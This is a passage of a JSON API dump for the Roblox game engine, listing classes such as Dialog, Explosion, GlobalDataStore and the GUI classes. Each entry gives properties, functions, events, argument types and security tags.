],"Name":"Resume","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepIn","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepOut","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepOver","tags":[],"Class":"DebuggerManager","type":"Function"},{"Arguments":[{"Name":"debugger","Type":"Instance"}],"Name":"DebuggerAdded","tags":[],"Class":"DebuggerManager","type":"Event"},{"Arguments":[{"Name":"debugger","Type":"Instance"}],"Name":"DebuggerRemoved","tags":[],"Class":"DebuggerManager","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"DebuggerWatch","tags":[]},{"ValueType":"string","type":"Property","Name":"Expression","tags":[],"Class":"DebuggerWatch"},{"ReturnType":"void","Arguments":[],"Name":"CheckSyntax","tags":[],"Class":"DebuggerWatch","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Dialog","tags":[]},{"ValueType":"float","type":"Property","Name":"ConversationDistance","tags":[],"Class":"Dialog"},{"ValueType":"string","type":"Property","Name":"GoodbyeDialog","tags":[],"Class":"Dialog"},{"ValueType":"bool","type":"Property","Name":"InUse","tags":[],"Class":"Dialog"},{"ValueType":"string","type":"Property","Name":"InitialPrompt","tags":[],"Class":"Dialog"},{"ValueType":"DialogPurpose","type":"Property","Name":"Purpose","tags":[],"Class":"Dialog"},{"ValueType":"DialogTone","type":"Property","Name":"Tone","tags":[],"Class":"Dialog"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"Instance","Name":"dialogChoice","Default":null}],"Name":"SignalDialogChoiceSelected","tags":["RobloxScriptSecurity"],"Class":"Dialog","type":"Function"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"dialogChoice","Type":"Instance"}],"Name":"DialogChoiceSelected","tags":[],"Class":"Dialog","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"DialogChoice","tags":[]},{"ValueType":"string","type":"Property","Name":"GoodbyeDialog","tags":[],"Class":"DialogChoice"},{"ValueType":"string","type":"Property","Name":"ResponseDialog","tags":[],"Class":"DialogChoice"},{"ValueType":"string","type":"Property","Name":"UserDialog","tags":[],"Class":"DialogChoice"},{"Superclass":"Instance","type":"Class","Name":"DoubleConstrainedValue","tags":[]},{"ValueType":"double","type":"Property","Name":"ConstrainedValue","tags":["hidden"],"Class":"DoubleConstrainedValue"},{"ValueType":"double","type":"Property","Name":"MaxValue","tags":[],"Class":"DoubleConstrainedValue"},{"ValueType":"double","type":"Property","Name":"MinValue","tags":[],"Class":"DoubleConstrainedValue"},{"ValueType":"double","type":"Property","Name":"Value","tags":[],"Class":"DoubleConstrainedValue"},{"Arguments":[{"Name":"value","Type":"double"}],"Name":"Changed","tags":[],"Class":"DoubleConstrainedValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"double"}],"Name":"changed","tags":["deprecated"],"Class":"DoubleConstrainedValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Dragger","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"Axis","Name":"axis","Default":"X"}],"Name":"AxisRotate","tags":[],"Class":"Dragger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"mousePart","Default":null},{"Type":"Vector3","Name":"pointOnMousePart","Default":null},{"Type":"Objects","Name":"parts","Default":null}],"Name":"MouseDown","tags":[],"Class":"Dragger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Ray","Name":"mouseRay","Default":null}],"Name":"MouseMove","tags":[],"Class":"Dragger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"MouseUp","tags":[],"Class":"Dragger","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Explosion","tags":[]},{"ValueType":"float","type":"Property","Name":"BlastPressure","tags":[],"Class":"Explosion"},{"ValueType":"float","type":"Property","Name":"BlastRadius","tags":[],"Class":"Explosion"},{"ValueType":"float","type":"Property","Name":"DestroyJointRadiusPercent","tags":[],"Class":"Explosion"},{"ValueType":"ExplosionType","type":"Property","Name":"ExplosionType","tags":[],"Class":"Explosion"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"Explosion"},{"Arguments":[{"Name":"part","Type":"Instance"},{"Name":"distance","Type":"float"}],"Name":"Hit","tags":[],"Class":"Explosion","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"FaceInstance","tags":["notbrowsable"]},{"ValueType":"NormalId","type":"Property","Name":"Face","tags":[],"Class":"FaceInstance"},{"Superclass":"FaceInstance","type":"Class","Name":"Decal","tags":[]},{"ValueType":"float","type":"Property","Name":"LocalTransparencyModifier","tags":["hidden"],"Class":"Decal"},{"ValueType":"float","type":"Property","Name":"Shiny","tags":["deprecated"],"Class":"Decal"},{"ValueType":"float","type":"Property","Name":"Specular","tags":["deprecated"],"Class":"Decal"},{"ValueType":"Content","type":"Property","Name":"Texture","tags":[],"Class":"Decal"},{"ValueType":"float","type":"Property","Name":"Transparency","tags":[],"Class":"Decal"},{"Superclass":"Decal","type":"Class","Name":"Texture","tags":[]},{"ValueType":"float","type":"Property","Name":"StudsPerTileU","tags":[],"Class":"Texture"},{"ValueType":"float","type":"Property","Name":"StudsPerTileV","tags":[],"Class":"Texture"},{"Superclass":"Instance","type":"Class","Name":"Feature","tags":[]},{"ValueType":"NormalId","type":"Property","Name":"FaceId","tags":[],"Class":"Feature"},{"ValueType":"InOut","type":"Property","Name":"InOut","tags":[],"Class":"Feature"},{"ValueType":"LeftRight","type":"Property","Name":"LeftRight","tags":[],"Class":"Feature"},{"ValueType":"TopBottom","type":"Property","Name":"TopBottom","tags":[],"Class":"Feature"},{"Superclass":"Feature","type":"Class","Name":"Hole","tags":["deprecated"]},{"Superclass":"Feature","type":"Class","Name":"MotorFeature","tags":["deprecated"]},{"Superclass":"Instance","type":"Class","Name":"Fire","tags":[]},{"ValueType":"Color3","type":"Property","Name":"Color","tags":[],"Class":"Fire"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Fire"},{"ValueType":"float","type":"Property","Name":"Heat","tags":[],"Class":"Fire"},{"ValueType":"Color3","type":"Property","Name":"SecondaryColor","tags":[],"Class":"Fire"},{"ValueType":"float","type":"Property","Name":"Size","tags":[],"Class":"Fire"},{"ValueType":"float","type":"Property","Name":"size","tags":["deprecated"],"Class":"Fire"},{"Superclass":"Instance","type":"Class","Name":"FlagStandService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"FlyweightService","tags":[]},{"Superclass":"FlyweightService","type":"Class","Name":"CSGDictionaryService","tags":[]},{"Superclass":"FlyweightService","type":"Class","Name":"NonReplicatedCSGDictionaryService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Folder","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ForceField","tags":[]},{"Superclass":"Instance","type":"Class","Name":"FriendService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetBreakFriendUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetCreateFriendRequestUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetDeleteFriendRequestUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enable","Default":null}],"Name":"SetEnabled","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetFriendsOnlineUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetGetFriendsUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetMakeFriendUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"FunctionalTest","tags":["deprecated"]},{"ValueType":"string","type":"Property","Name":"Description","tags":[],"Class":"FunctionalTest"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Error","tags":[],"Class":"FunctionalTest","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Failed","tags":[],"Class":"FunctionalTest","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Pass","tags":[],"Class":"FunctionalTest","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Passed","tags":[],"Class":"FunctionalTest","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Warn","tags":[],"Class":"FunctionalTest","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"GamePassService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"playerHasPassUrl","Default":null}],"Name":"SetPlayerHasPassUrl","tags":["LocalUserSecurity"],"Class":"GamePassService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"gamePassId","Default":null}],"Name":"PlayerHasPass","tags":[],"Class":"GamePassService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"GameSettings","tags":["notbrowsable"]},{"ValueType":"float","type":"Property","Name":"BubbleChatLifetime","tags":[],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"BubbleChatMaxBubbles","tags":[],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"ChatHistory","tags":[],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"ChatScrollLength","tags":[],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"CollisionSoundEnabled","tags":["deprecated"],"Class":"GameSettings"},{"ValueType":"float","type":"Property","Name":"CollisionSoundVolume","tags":["deprecated"],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"HardwareMouse","tags":[],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"MaxCollisionSounds","tags":["deprecated"],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"ReportAbuseChatHistory","tags":[],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"SoftwareSound","tags":[],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"SoundEnabled","tags":[],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"VideoCaptureEnabled","tags":[],"Class":"GameSettings"},{"ValueType":"VideoQualitySettings","type":"Property","Name":"VideoQuality","tags":[],"Class":"GameSettings"},{"Arguments":[{"Name":"recording","Type":"bool"}],"Name":"VideoRecordingChangeRequest","tags":["RobloxScriptSecurity"],"Class":"GameSettings","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"GamepadService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Geometry","tags":[]},{"Superclass":"Instance","type":"Class","Name":"GlobalDataStore","tags":[]},{"ReturnType":"Connection","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Function","Name":"callback","Default":null}],"Name":"OnUpdate","tags":[],"Class":"GlobalDataStore","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"GetAsync","tags":[],"Class":"GlobalDataStore","type":"YieldFunction"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"int","Name":"delta","Default":"1"}],"Name":"IncrementAsync","tags":[],"Class":"GlobalDataStore","type":"YieldFunction"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetAsync","tags":[],"Class":"GlobalDataStore","type":"YieldFunction"},{"ReturnType":"Tuple","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Function","Name":"transformFunction","Default":null}],"Name":"UpdateAsync","tags":[],"Class":"GlobalDataStore","type":"YieldFunction"},{"Superclass":"GlobalDataStore","type":"Class","Name":"OrderedDataStore","tags":[]},{"ReturnType":"Instance","Arguments":[{"Type":"bool","Name":"ascending","Default":null},{"Type":"int","Name":"pagesize","Default":null},{"Type":"Variant","Name":"minValue","Default":null},{"Type":"Variant","Name":"maxValue","Default":null}],"Name":"GetSortedAsync","tags":[],"Class":"OrderedDataStore","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"GroupService","tags":["notCreatable"]},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetAlliesAsync","tags":[],"Class":"GroupService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetEnemiesAsync","tags":[],"Class":"GroupService","type":"YieldFunction"},{"ReturnType":"Variant","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetGroupInfoAsync","tags":[],"Class":"GroupService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetGroupsAsync","tags":[],"Class":"GroupService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"GuiBase","tags":[]},{"Superclass":"GuiBase","type":"Class","Name":"GuiBase2d","tags":["notbrowsable"]},{"ValueType":"Vector2","type":"Property","Name":"AbsolutePosition","tags":["readonly"],"Class":"GuiBase2d"},{"ValueType":"Vector2","type":"Property","Name":"AbsoluteSize","tags":["readonly"],"Class":"GuiBase2d"},{"Superclass":"GuiBase2d","type":"Class","Name":"GuiObject","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"Active","tags":[],"Class":"GuiObject"},{"ValueType":"BrickColor","type":"Property","Name":"BackgroundColor","tags":["deprecated","hidden"],"Class":"GuiObject"},{"ValueType":"Color3","type":"Property","Name":"BackgroundColor3","tags":[],"Class":"GuiObject"},{"ValueType":"float","type":"Property","Name":"BackgroundTransparency","tags":[],"Class":"GuiObject"},{"ValueType":"BrickColor","type":"Property","Name":"BorderColor","tags":["deprecated","hidden"],"Class":"GuiObject"},{"ValueType":"Color3","type":"Property","Name":"BorderColor3","tags":[],"Class":"GuiObject"},{"ValueType":"int","type":"Property","Name":"BorderSizePixel","tags":[],"Class":"GuiObject"},{"ValueType":"bool","type":"Property","Name":"ClipsDescendants","tags":[],"Class":"GuiObject"},{"ValueType":"bool","type":"Property","Name":"Draggable","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"NextSelectionDown","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"NextSelectionLeft","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"NextSelectionRight","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"NextSelectionUp","tags":[],"Class":"GuiObject"},{"ValueType":"UDim2","type":"Property","Name":"Position","tags":[],"Class":"GuiObject"},{"ValueType":"float","type":"Property","Name":"Rotation","tags":[],"Class":"GuiObject"},{"ValueType":"bool","type":"Property","Name":"Selectable","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"SelectionImageObject","tags":[],"Class":"GuiObject"},{"ValueType":"UDim2","type":"Property","Name":"Size","tags":[],"Class":"GuiObject"},{"ValueType":"SizeConstraint","type":"Property","Name":"SizeConstraint","tags":[],"Class":"GuiObject"},{"ValueType":"float","type":"Property","Name":"Transparency","tags":["hidden"],"Class":"GuiObject"},{"ValueType":"bool","type":"Property","Name":"Visible","tags":[],"Class":"GuiObject"},{"ValueType":"int","type":"Property","Name":"ZIndex","tags":[],"Class":"GuiObject"},{"ReturnType":"bool","Arguments":[{"Type":"UDim2","Name":"endPosition","Default":null},{"Type":"EasingDirection","Name":"easingDirection","Default":"Out"},{"Type":"EasingStyle","Name":"easingStyle","Default":"Quad"},{"Type":"float","Name":"time","Default":"1"},{"Type":"bool","Name":"override","Default":"false"},{"Type":"Function","Name":"callback","Default":"nil"}],"Name":"TweenPosition","tags":[],"Class":"GuiObject","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UDim2","Name":"endSize","Default":null},{"Type":"EasingDirection","Name":"easingDirection","Default":"Out"},{"Type":"EasingStyle","Name":"easingStyle","Default":"Quad"},{"Type":"float","Name":"time","Default":"1"},{"Type":"bool","Name":"override","Default":"false"},{"Type":"Function","Name":"callback","Default":"nil"}],"Name":"TweenSize","tags":[],"Class":"GuiObject","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UDim2","Name":"endSize","Default":null},{"Type":"UDim2","Name":"endPosition","Default":null},{"Type":"EasingDirection","Name":"easingDirection","Default":"Out"},{"Type":"EasingStyle","Name":"easingStyle","Default":"Quad"},{"Type":"float","Name":"time","Default":"1"},{"Type":"bool","Name":"override","Default":"false"},{"Type":"Function","Name":"callback","Default":"nil"}],"Name":"TweenSizeAndPosition","tags":[],"Class":"GuiObject","type":"Function"},{"Arguments":[{"Name":"initialPosition","Type":"UDim2"}],"Name":"DragBegin","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"DragStopped","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"}],"Name":"InputBegan","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"}],"Name":"InputChanged","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"}],"Name":"InputEnded","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseEnter","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseLeave","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseMoved","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseWheelBackward","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseWheelForward","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[],"Name":"SelectionGained","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[],"Name":"SelectionLost","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"state","Type":"UserInputState"}],"Name":"TouchLongPress","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"totalTranslation","Type":"Vector2"},{"Name":"velocity","Type":"Vector2"},{"Name":"state","Type":"UserInputState"}],"Name":"TouchPan","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"scale","Type":"float"},{"Name":"velocity","Type":"float"},{"Name":"state","Type":"UserInputState"}],"Name":"TouchPinch","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"rotation","Type":"float"},{"Name":"velocity","Type":"float"},{"Name":"state","Type":"UserInputState"}],"Name":"TouchRotate","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"swipeDirection","Type":"SwipeDirection"},{"Name":"numberOfTouches","Type":"int"}],"Name":"TouchSwipe","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"}],"Name":"TouchTap","tags":[],"Class":"GuiObject","type":"Event"},{"Superclass":"GuiObject","type":"Class","Name":"Frame","tags":[]},{"ValueType":"FrameStyle","type":"Property","Name":"Style","tags":[],"Class":"Frame"},{"Superclass":"GuiObject","type":"Class","Name":"GuiButton","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"AutoButtonColor","tags":[],"Class":"GuiButton"},{"ValueType":"bool","type":"Property","Name":"Modal","tags":[],"Class":"GuiButton"},{"ValueType":"bool","type":"Property","Name":"Selected","tags":[],"Class":"GuiButton"},{"ValueType":"ButtonStyle","type":"Property","Name":"Style","tags":[],"Class":"GuiButton"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"verb","Default":null}],"Name":"SetVerb","tags":["RobloxScriptSecurity"],"Class":"GuiButton","type":"Function"},{"Arguments":[],"Name":"MouseButton1Click","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseButton1Down","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseButton1Up","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[],"Name":"MouseButton2Click","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseButton2Down","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseButton2Up","tags":[],"Class":"GuiButton","type":"Event"},{"Superclass":"GuiButton","type":"Class","Name":"ImageButton","tags":[]},{"ValueType":"Content","type":"Property","Name":"Image","tags":[],"Class":"ImageButton"},{"ValueType":"Color3","type":"Property","Name":"ImageColor3","tags":[],"Class":"ImageButton"},{"ValueType":"Vector2","type":"Property","Name":"ImageRectOffset","tags":[],"Class":"ImageButton"},{"ValueType":"Vector2","type":"Property","Name":"ImageRectSize","tags":[],"Class":"ImageButton"},{"ValueType":"float","type":"Property","Name":"ImageTransparency","tags":[],"Class":"ImageButton"},{"ValueType":"ScaleType","type":"Property","Name":"ScaleType","tags":[],"Class":"ImageButton"},{"ValueType":"Rect2D","type":"Property","Name":"SliceCenter","tags":[],"Class":"ImageButton"},{"Superclass":"GuiButton","type":"Class","Name":"TextButton","tags":[]},{"ValueType":"Font","type":"Property","Name":"Font","tags":[],"Class":"TextButton"},{"ValueType":"FontSize","type":"Property","Name":"FontSize","tags":[],"Class":"TextButton"},{"ValueType":"string","type":"Property","Name":"Text","tags":[],"Class":"TextButton"},{"ValueType":"Vector2","type":"Property","Name":"TextBounds","tags":["readonly"],"Class":"TextButton"},{"ValueType":"BrickColor","type":"Property","Name":"TextColor","tags":["deprecated","hidden"],"Class":"TextButton"},{"ValueType":"Color3","type":"Property","Name":"TextColor3","tags":[],"Class":"TextButton"},{"ValueType":"bool","type":"Property","Name":"TextFits","tags":["readonly"],"Class":"TextButton"},{"ValueType":"bool","type":"Property","Name":"TextScaled","tags":[],"Class":"TextButton"},{"ValueType":"Color3","type":"Property","Name":"TextStrokeColor3","tags":[],"Class":"TextButton"},{"ValueType":"float","type":"Property","Name":"TextStrokeTransparency","tags":[],"Class":"TextButton"},{"ValueType":"float","type":"Property","Name":"TextTransparency","tags":[],"Class":"TextButton"},{"ValueType":"bool","type":"Property","Name":"TextWrap","tags":["deprecated"],"Class":"TextButton"},{"ValueType":"bool","type":"Property","Name":"TextWrapped","tags":[],"Class":"TextButton"},{"ValueType":"TextXAlignment","type":"Property","Name":"TextXAlignment","tags":[],"Class":"TextButton"},{"ValueType":"TextYAlignment","type":"Property","Name":"TextYAlignment","tags":[],"Class":"TextButton"},{"Superclass":"GuiObject","type":"Class","Name":"GuiLabel","tags":[]},{"Superclass":"GuiLabel","type":"Class","Name":"ImageLabel","tags":[]},{"ValueType":"Content","type":"Property","Name":"Image","tags":[],"Class":"ImageLabel"},{"ValueType":"Color3","type":"Property","Name":"ImageColor3","tags":[],"Class":"ImageLabel"},{"ValueType":"Vector2","type":"Property","Name":"ImageRectOffset","tags":[],"Class":"ImageLabel"},{"ValueType":"Vector2","type":"Property","Name":"ImageRectSize","tags":[],"Class":"ImageLabel"},{"ValueType":"float","type":"Property","Name":"ImageTransparency","tags":[],"Class":"ImageLabel"},{"ValueType":"ScaleType","type":"Property","Name":"ScaleType","tags":[],"Class":"ImageLabel"},{"ValueType":"Rect2D","type":"Property","Name":"SliceCenter","tags":[],"Class":"ImageLabel"},{"Superclass":"GuiLabel","type":"Class","Name":"TextLabel","tags":[]},{"ValueType":"Font","type":"Property","Name":"Font","tags":[],"Class":"TextLabel"},{"ValueType":"FontSize","type":"Property","Name":"FontSize","tags":[],"Class":"TextLabel"},{"ValueType":"string","type":"Property","Name":"Text","tags":[],"Class":"TextLabel"},{"ValueType":"Vector2","type":"Property","Name":"TextBounds","tags":["readonly"],"Class":"TextLabel"},{"ValueType":"BrickColor","type":"Property","Name":"TextColor","tags":["deprecated","hidden"],"Class":"TextLabel"},{"ValueType":"Color3","type":"Property","Name":"TextColor3","tags":[],"Class":"TextLabel"},{"ValueType":"bool","type":"Property","Name":"TextFits","tags":["readonly"],"Class":"TextLabel"},{"ValueType":"bool","type":"Property","Name":"TextScaled","tags":[],"Class":"TextLabel"},{"ValueType":"Color3","type":"Property","Name":"TextStrokeColor3","tags":[],"Class":"TextLabel"},{"ValueType":"float","type":"Property","Name":"TextStrokeTransparency","tags":[],"Class":"TextLabel"},{"ValueType":"float","type":"Property","Name":"TextTransparency","tags":[],"Class":"TextLabel"},{"ValueType":"bool","type":"Property","Name":"TextWrap","tags":["deprecated"],"Class":"TextLabel"},{"ValueType":"bool","type":"Property","Name":"TextWrapped","tags":[],"Class":"TextLabel"},{"ValueType":"TextXAlignment","type":"Property","Name":"TextXAlignment","tags":[],"Class":"TextLabel"},{"ValueType":"TextYAlignment","type":"Property","Name":"TextYAlignment","tags":[],"Class":"TextLabel"},{"Superclass":"GuiObject","type":"Class","Name":"Scale9Frame","tags":[]},{"ValueType":"Vector2int16","type":"Property","Name":"ScaleEdgeSize","tags":[],"Class":"Scale9Frame"},{"ValueType":"string","type":"Property","Name":"SlicePrefix","tags":[],"Class":"Scale9Frame"},{"Superclass":"GuiObject","type":"Class","Name":"ScrollingFrame","tags":[]},{"ValueType":"Vector2","type":"Property","Name":"AbsoluteWindowSize","tags":["readonly"],"Class":"ScrollingFrame"},{"ValueType":"Content","type":"Property","Name":"BottomImage","tags":[],"Class":"ScrollingFrame"},{"ValueType":"Vector2","type":"Property","Name":"CanvasPosition","tags":[],"Class":"ScrollingFrame"},{"ValueType":"UDim2","type":"Property","Name":"CanvasSize","tags":[],"Class":"ScrollingFrame"},{"ValueType":"Content","type":"Property","Name":"MidImage","tags":[],"Class":"ScrollingFrame"},{"ValueType":"int","type":"Property","Name":"ScrollBarThickness","tags":[],"Class":"ScrollingFrame"},{"ValueType":"bool","type":"Property","Name":"ScrollingEnabled","tags":[],"Class":"ScrollingFrame"},{"ValueType":"Content","type":"Property","Name":"TopImage","tags":[],"Class":"ScrollingFrame"},{"Superclass":"GuiObject","type":"Class","Name":"TextBox","tags":[]},{"ValueType":"bool","type":"Property","Name":"ClearTextOnFocus","tags":[],"Class":"TextBox"},{"ValueType":"Font","type":"Property","Name":"Font","tags":[],"Class":"TextBox"},{"ValueType":"FontSize","type":"Property","Name":"FontSize","tags":[],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"MultiLine","tags":[],"Class":"TextBox"},{"ValueType":"string","type":"Property","Name":"Text","tags":[],"Class":"TextBox"},{"ValueType":"Vector2","type":"Property","Name":"TextBounds","tags":["readonly"],"Class":"TextBox"},{"ValueType":"BrickColor","type":"Property","Name":"TextColor","tags":["deprecated","hidden"],"Class":"TextBox"},{"ValueType":"Color3","type":"Property","Name":"TextColor3","tags":[],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"TextFits","tags":["readonly"],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"TextScaled","tags":[],"Class":"TextBox"},{"ValueType":"Color3","type":"Property","Name":"TextStrokeColor3","tags":[],"Class":"TextBox"},{"ValueType":"float","type":"Property","Name":"TextStrokeTransparency","tags":[],"Class":"TextBox"},{"ValueType":"float","type":"Property","Name":"TextTransparency","tags":[],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"TextWrap","tags":["deprecated"],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"TextWrapped","tags":[],"Class":"TextBox"},{"ValueType":"TextXAlignment","type":"Property","Name":"TextXAlignment","tags":[],"Class":"TextBox"},{"ValueType":"TextYAlignment","type":"Property","Name":"TextYAlignment","tags":[],"Class":"TextBox"},{"ReturnType":"void","Arguments":[],"Name":"CaptureFocus","tags":[],"Class":"TextBox","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsFocused","tags":[],"Class":"TextBox","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ReleaseFocus","tags":[],"Class":"TextBox","type":"Function"},{"Arguments":[{"Name":"enterPressed","Type":"bool"},{"Name":"inputThatCausedFocusLoss","Type":"Instance"}],"Name":"FocusLost","tags":[],"Class":"TextBox","type":"Event"},{"Arguments":[],"Name":"Focused","tags":[],"Class":"TextBox","type":"Event"},{"Superclass":"GuiBase2d","type":"Class","Name":"LayerCollector","tags":[]},{"Superclass":"LayerCollector","type":"Class","Name":"BillboardGui","tags":[]},{"ValueType":"bool","type":"Property","Name":"Active","tags":[],"Class":"BillboardGui"},{"ValueType":"Object","type":"Property","Name":"Adornee","tags":[],"Class":"BillboardGui"},{"ValueType":"bool","type":"Property","Name":"AlwaysOnTop","tags":[],"Class":"BillboardGui"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"BillboardGui"},{"ValueType":"Vector3","type":"Property","Name":"ExtentsOffset","tags":[],"Class":"BillboardGui"},{"ValueType":"Object","type":"Property","Name":"PlayerToHideF